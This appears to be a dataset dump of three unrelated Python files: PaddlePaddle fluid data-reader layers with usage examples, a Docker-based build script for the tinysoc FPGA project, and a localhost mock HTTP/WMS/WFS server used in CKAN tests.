lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source in Python side. When :code:`Executor::Run()` is invoked in C++
side, the data from the generator would be read automatically. Unlike
:code:`DataFeeder.feed()`, the data reading process and
:code:`Executor::Run()` process can run in parallel using
:code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
called when the pass ends and :code:`fluid.core.EOFException` raises.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples which declaring data shapes.
dtypes(list|tuple): List of strs which declaring data type.
lod_levels(list|tuple): List of ints which declaring data lod_level.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
# user defined network, here a softmax regresssion example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
Works much like py_reader except that it's input is feed_list
instead of shapes, dtypes and lod_levels
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
feed_list(list(Variable)): The data feed list.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(img, label):
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
image = fluid.layers.data(name='image', shape=[1, 28, 28], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # some network definition
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True, loss_name=loss.name)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=None,
buffer_size=None,
pass_num=1,
is_test=None):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
Via the Reader Variable, we can get data from given files. All files must
have name suffixs to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
dtypes(list): List of strs which declaring data type.
thread_num(None): The number of thread to read files.
Default: min(len(filenames), cpu_number).
buffer_size(None): The buffer size of reader. Default: 3 * thread_num
pass_num(int): Number of passes to run.
is_test(bool|None): Whether `open_files` used for testing or not. If it
is used for testing, the order of data generated is same as the file
order. Otherwise, it is not guaranteed the order of data is same
between every epoch. [Default: False].
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if thread_num is None:
thread_num = min(len(filenames), multiprocessing.cpu_count())
else:
thread_num = int(thread_num)
if buffer_size is None:
buffer_size = 3 * thread_num
else:
buffer_size = int(buffer_size)
if isinstance(filenames, six.string_types):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
attrs = {
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
}
if is_test is not None:
attrs['is_test'] = is_test
startup_blk.append_op(
type='open_files', outputs={'Out': [startup_reader]}, attrs=attrs)
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_reader)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Creates a data reader whose data output is shuffled.
Output from the iterator that created by original reader will be
buffered into shuffle buffer, and then shuffled. The size of shuffle buffer
is determined by argument buf_size.
Args:
reader(callable): the original reader whose output will be shuffled.
buf_size(int): shuffle buffer size.
Returns:
callable: the new reader whose output is shuffled.
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
def batch(reader, batch_size):
"""
This layer is a reader decorator. It takes a reader and adds
'batching' decoration on it. When reading with the result
decorated reader, output data will be automatically organized
to the form of batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
# Each 5 adjacent instances will be automatically combined together
# to become a batch. So what we get('data') is a batch data instead
# of an instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
Wrap a double buffer reader. The data will copy to target place with a
double buffer queue. If the target place is None, the place that executor
perform on will be used.
Args:
reader(Variable): the reader variable need to be wrapped.
place(Place): the place of target data. Default is the sample place of
executor perform.
name(str): Variable name. None if the user does not care.
Returns:
wrapped reader with double buffer.
Examples:
>>> reader = fluid.layers.open_files(filenames=['somefile'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def multi_pass(reader, pass_num):
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
shapes=[(-1, 748), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(
filenames=['./data1.recordio', './data2.recordio'],
shapes=[(3, 224, 224), (1, )],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def _is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@signature_safe_contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog._create_block()
yield
self.main_prog._rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self._is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in six.moves.range(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, args=attrs)
|
build.py
|
#!/usr/bin/env python
import os
import sys
from queue import Queue, Empty
from threading import Thread
from subprocess import PIPE, Popen
BUILD_IMAGE = 'build/nevercast_tinysoc_tinysoc_0.1/tinyfpga_bx-icestorm/nevercast_tinysoc_tinysoc_0.1.bin'
RISCV_TOOLCHAIN_PATH = '/opt/riscv32i/bin/'
FIRMWARE_OUTPUT_PATH = 'build/firmware/'
FIRMWARE_IMAGE_NAME = 'firmware'
FIRMWARE_LINKER_SCRIPT = 'firmware/sections.lds'
FIRMWARE_SOURCE = [
'firmware/start.S',
'firmware/entry.c'
]
current_prefix = None
announced_mountpath = False
def _log_stdout(output_line):
sys.stdout.write(current_prefix + output_line)
def _log_stderr(output_line):
sys.stderr.write(current_prefix + output_line)
def _set_subtask(subtask_name, subtask_index=None, subtask_total=None):
global current_prefix
if subtask_index is None or subtask_total is None:
subtask_text = subtask_name
else:
subtask_text = '[{}/{}] {}'.format(subtask_index, subtask_total, subtask_name)
root_task = current_prefix.split(':', 1)[0]
current_prefix = '{}: {}: '.format(root_task, subtask_text)
def _thread_queue_output(out, queue):
for line in iter(out.readline, ''):
queue.put(line)
out.close()
def _process_create_output_queues(process):
out_q, err_q = Queue(), Queue()
for thread_args in zip((process.stdout, process.stderr), (out_q, err_q)):
t = Thread(target=_thread_queue_output, args=thread_args)
t.daemon = True
t.start()
return out_q, err_q
def _drain_output_queue(queue, line_handler):
while True: # breaks on empty
try:
line_handler(queue.get_nowait())
except Empty:
return
def _invoke(*popen_args, interactive=False, **popen_kwargs):
if interactive: # we perform a passthrough
process = Popen(*popen_args, stdout=sys.stdout, stderr=sys.stderr, stdin=sys.stdin, text=True, bufsize=1, **popen_kwargs)
process.wait()
else: # otherwise, intercept the output and prefix it
process = Popen(*popen_args, stdout=PIPE, stderr=PIPE, text=True, bufsize=1, **popen_kwargs)
q_stdout, q_stderr = _process_create_output_queues(process)
while process.poll() is None:
_drain_output_queue(q_stdout, _log_stdout)
_drain_output_queue(q_stderr, _log_stderr)
_drain_output_queue(q_stdout, _log_stdout)
_drain_output_queue(q_stderr, _log_stderr)
return process
def _invoke_container(container_name, container_command=None, **invoke_kwargs):
global announced_mountpath
absolute_path = os.path.abspath(os.getcwd())
if not announced_mountpath:
_log_stdout('Mounting {} to /workspace in container.\n'.format(absolute_path))
announced_mountpath = True
if container_command is not None:
if isinstance(container_command, (list, tuple)):
extra_args = list(container_command)
else:
command_str = str(container_command)
if ' ' in command_str:
extra_args = command_str.split(' ')
else:
extra_args = [command_str]
return _invoke(['docker', 'run', '--rm', '-it', '-v', '{}:/workspace'.format(absolute_path), container_name] + extra_args, **invoke_kwargs)
else:
return _invoke(['docker', 'run', '--rm', '-it', '-v', '{}:/workspace'.format(absolute_path), container_name], **invoke_kwargs)
def check_process(process, okay_exitcodes=(0,)):
if process.returncode is None:
return # maybe this is actual a code error?
if process.returncode not in okay_exitcodes:
_log_stderr('Process failed to exit cleanly, errno: {}\n'.format(process.returncode))
sys.exit(process.returncode)
else: # Don't log anything, it's noisy
pass
def cmd_interactive(**parameters):
container_name = parameters['container_name']
check_process(_invoke_container(container_name, interactive=True))
def cmd_build(**parameters):
container_name = parameters['container_name']
check_process(_invoke_container(container_name, 'fusesoc run --target=tinyfpga_bx nevercast:tinysoc:tinysoc'))
def cmd_program(**parameters):
check_process(_invoke(['tinyprog', '-p', BUILD_IMAGE, '-u', FIRMWARE_OUTPUT_PATH + FIRMWARE_IMAGE_NAME + '.bin']))
def cmd_test(**parameters):
container_name = parameters['container_name']
check_process(_invoke_container(container_name, 'fusesoc run --target=sim nevercast:tinysoc:tinysoc'))
def cmd_compile(**parameters):
container_name = parameters['container_name']
_set_subtask('init', 1, 3)
check_process(
_invoke(['mkdir', '-p', FIRMWARE_OUTPUT_PATH])
)
_set_subtask('gcc', 2, 3)
check_process(
_invoke_container(container_name,
'{riscv_toolchain}riscv32-unknown-elf-gcc -v -march=rv32imc -nostartfiles -Wl,-Bstatic,-T,{sections},--strip-debug,-Map={output_path}{image_name}.map,--cref -ffreestanding -nostdlib -o {output_path}{image_name}.elf {sources}'.format(
riscv_toolchain=RISCV_TOOLCHAIN_PATH,
output_path=FIRMWARE_OUTPUT_PATH,
sections=FIRMWARE_LINKER_SCRIPT,
image_name=FIRMWARE_IMAGE_NAME,
sources=' '.join(FIRMWARE_SOURCE)
)
)
)
_set_subtask('objcopy', 3, 3)
check_process(
_invoke_container(container_name,
'{riscv_toolchain}riscv32-unknown-elf-objcopy -v -O binary {output_path}{image_name}.elf {output_path}{image_name}.bin'.format(
riscv_toolchain=RISCV_TOOLCHAIN_PATH,
output_path=FIRMWARE_OUTPUT_PATH,
image_name=FIRMWARE_IMAGE_NAME
)
)
)
def help(executable):
print('! tinysoc build script !')
print('parameters:')
print(' container_name :: The name of the Docker container to use, default: nevercast/tinysoc:latest')
print(' clk_freq_hz :: Clock frequency to use for simulation and hardware builds, default: 16MHz')
print('commands:')
print(' interactive :: Start an interactive container and open shell')
print(' compile :: Compile tinysoc firmware into a flashable image')
print(' build :: Build a tinysoc hardware image for the TinyFPGA')
print(' program :: Program the last built image to the TinyFPGA')
print(' test :: Simulate the test bench')
print('usage:')
print('{} [parameter=value]... COMMAND [COMMANDS]...'.format(executable))
print('example: Build, Test and Program the TinyFPGA with tinysoc, using default parameters')
print('{} build test program'.format(executable))
print('! end of help !')
def main():
global current_prefix
executable, *arguments = sys.argv
if len(arguments) == 0:
help(executable)
return
parameters = {
'container_name': 'nevercast/tinysoc:latest',
'clk_freq_hz': 16_000_000
}
parameter_types = {
'container_name': str,
'clk_freq_hz': int
}
command_chain = []
valid_commands = [
'interactive', 'build', 'program', 'test', 'compile'
]
for argument in arguments:
if '=' in argument:
key, value = argument.split('=', 1)
if key not in parameters:
help(executable)
print('Parameter {} is not defined. Aborting.'.format(key))
return
# TODO(josh): Experiment or implement in the future, not sure if I'll want this
if key == 'clk_freq_hz':
print('clk_freq_hz parameter is not implemented, sorry! Aborting.')
return
# /TODO
parameters[key] = parameter_types[key](value)
elif argument in valid_commands:
if argument in command_chain:
help(executable)
print('Command {} was already specified earlier in the chain. Aborting.'.format(argument))
return
else:
command_chain.append(argument)
else:
help(executable)
print('Argument {} was not understood. Aborting.'.format(argument))
return
if not command_chain:
help(executable)
print('No commands were specified. Aborting.')
return
for index, command in enumerate(command_chain):
current_prefix = '[{}/{}] {}: '.format(index + 1, len(command_chain), command)
_log_stdout('Begin {}\n'.format(command))
globals()['cmd_{}'.format(command)](**parameters)
if __name__ == '__main__':
main()
|
mock_remote_server.py
|
"""
An HTTP server that listens on localhost and returns a variety of responses for
mocking remote servers.
"""
from contextlib import contextmanager
from threading import Thread
from time import sleep
from wsgiref.simple_server import make_server
import urllib2
import socket
import os
class MockHTTPServer(object):
"""
Mock HTTP server that can take the place of a remote server for testing
fetching of remote resources.
Uses contextmanager to allow easy setup and teardown of the WSGI server in
a separate thread, eg::
>>> with MockTestServer().serve() as server_address:
... urllib2.urlopen(server_address)
...
Subclass this and override __call__ to provide your own WSGI handler function.
"""
def __call__(self, environ, start_response):
raise NotImplementedError()
@contextmanager
def serve(self, host='localhost', port_range=(8000, 9000)):
"""
Start an instance of wsgiref.simple_server set up to handle requests in
a separate daemon thread.
Return the address of the server eg ('http://localhost:8000').
This uses context manager to make sure the server is stopped::
>>> with MockTestServer().serve() as addr:
... print urllib2.urlopen('%s/?content=hello+world').read()
...
'hello world'
"""
for port in range(*port_range):
try:
server = make_server(host, port, self)
except socket.error:
continue
break
else:
raise Exception("Could not bind to a port in range %r" % (port_range,))
serving = True
def _serve_until_stopped():
while serving:
server.handle_request()
thread = Thread(target=_serve_until_stopped)
thread.daemon = True
thread.start()
try:
yield 'http://%s:%d' % (host, port)
finally:
serving = False
# Call the server to make sure the waiting handle_request()
# call completes. Set a very small timeout as we don't actually need to
# wait for a response. We don't care about exceptions here either.
try:
urllib2.urlopen("http://%s:%s/" % (host, port), timeout=0.01)
except Exception:
pass
@classmethod
def get_content(cls, varspec):
"""
Return the value of the variable at varspec, which must be in the
format 'package.module:variable'. If variable is callable, it will be
called and its return value used.
"""
modpath, var = varspec.split(':')
mod = reduce(getattr, modpath.split('.')[1:], __import__(modpath))
var = reduce(getattr, var.split('.'), mod)
try:
return var()
except TypeError:
return var
class MockEchoTestServer(MockHTTPServer):
"""
WSGI application that echos back the status, headers and
content passed via the URL, eg:
a 500 error response: 'http://localhost/?status=500'
a 200 OK response, returning the function's docstring:
'http://localhost/?status=200;content-type=text/plain;content_var
=ckan.tests.lib.test_package_search:test_wsgi_app.__doc__'
To specify content, use:
content=string
content_var=package.module:variable
"""
def __call__(self, environ, start_response):
from httplib import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
# if 'redirect' in redirect.str_params:
# params = dict([(key, value) for param in request.str_params \
# if key != 'redirect'])
# redirect_status = int(request.str_params['redirect'])
# status = int(request.str_params.get('status', '200'))
# resp = make_response(render_template('error.html'), redirect_status)
# resp.headers['Location'] = url_for(request.path, params)
# return resp
if 'content_var' in request.str_params:
content = request.str_params.get('content_var')
content = self.get_content(content)
elif 'content_long' in request.str_params:
content = '*' * 1000001
else:
content = request.str_params.get('content', '')
if 'method' in request.str_params \
and request.method.lower() != request.str_params['method'].lower():
content = ''
status = 405
if isinstance(content, unicode):
raise TypeError("Expected raw byte string for content")
headers = [
item
for item in request.str_params.items()
if item[0] not in ('content', 'status')
]
if 'length' in request.str_params:
cl = request.str_params.get('length')
headers += [('Content-Length', cl)]
elif content and 'no-content-length' not in request.str_params:
headers += [('Content-Length', str(len(content)))]
start_response(
'%d %s' % (status, responses[status]),
headers
)
return [content]
class MockTimeoutTestServer(MockHTTPServer):
"""
Sleeps ``timeout`` seconds before responding. Make sure that your timeout value is
less than this to check handling timeout conditions.
"""
def __init__(self, timeout):
super(MockTimeoutTestServer, self).__init__()
self.timeout = timeout
def __call__(self, environ, start_response):
# Sleep until self.timeout or the parent thread finishes
sleep(self.timeout)
start_response('200 OK', [('Content-Type', 'text/plain')])
return ['xyz']
def get_file_content(data_filename):
filepath = os.path.join(os.path.dirname(__file__), 'data', data_filename)
assert os.path.exists(filepath), filepath
with open(filepath, 'rb') as f:
return f.read()
class MockWmsServer(MockHTTPServer):
"""Acts like an OGC WMS server (well, one basic call)
"""
def __init__(self, wms_version='1.3'):
self.wms_version = wms_version
super(MockWmsServer, self).__init__()
def __call__(self, environ, start_response):
from httplib import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
headers = {'Content-Type': 'text/plain'}
# e.g. params ?service=WMS&request=GetCapabilities&version=1.1.1
if request.str_params.get('service') != 'WMS':
status = 200
content = ERROR_WRONG_SERVICE
elif request.str_params.get('request') != 'GetCapabilities':
status = 405
content = '"request" param wrong'
elif 'version' in request.str_params and \
request.str_params.get('version') != self.wms_version:
status = 405
content = '"version" not compatible - need to be %s' % self.wms_version
elif self.wms_version == '1.1.1':
status = 200
content = get_file_content('wms_getcap_1.1.1.xml')
elif self.wms_version == '1.3':
status = 200
content = get_file_content('wms_getcap_1.3.xml')
start_response(
'%d %s' % (status, responses[status]),
headers.items()
)
return [content]
class MockWfsServer(MockHTTPServer):
"""Acts like an OGC WFS server (well, one basic call)
"""
def __init__(self):
super(MockWfsServer, self).__init__()
def __call__(self, environ, start_response):
from httplib import responses
from webob import Request
request = Request(environ)
status = int(request.str_params.get('status', '200'))
headers = {'Content-Type': 'text/plain'}
# e.g. params ?service=WFS&request=GetCapabilities
if request.str_params.get('service') != 'WFS':
status = 200
content = ERROR_WRONG_SERVICE
elif request.str_params.get('request') != 'GetCapabilities':
status = 405
content = '"request" param wrong'
else:
status = 200
content = get_file_content('wfs_getcap.xml')
start_response(
'%d %s' % (status, responses[status]),
headers.items()
)
return [content]
ERROR_WRONG_SERVICE = "<ows:ExceptionReport version='1.1.0' language='en'" \
" xmlns:ows='http://www.opengis.net/ows'><ows:Exception exceptionCode='NoApplicableCode'>" \
"<ows:ExceptionText>Wrong service type.</ows:ExceptionText></ows:Exception></ows:ExceptionReport>"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.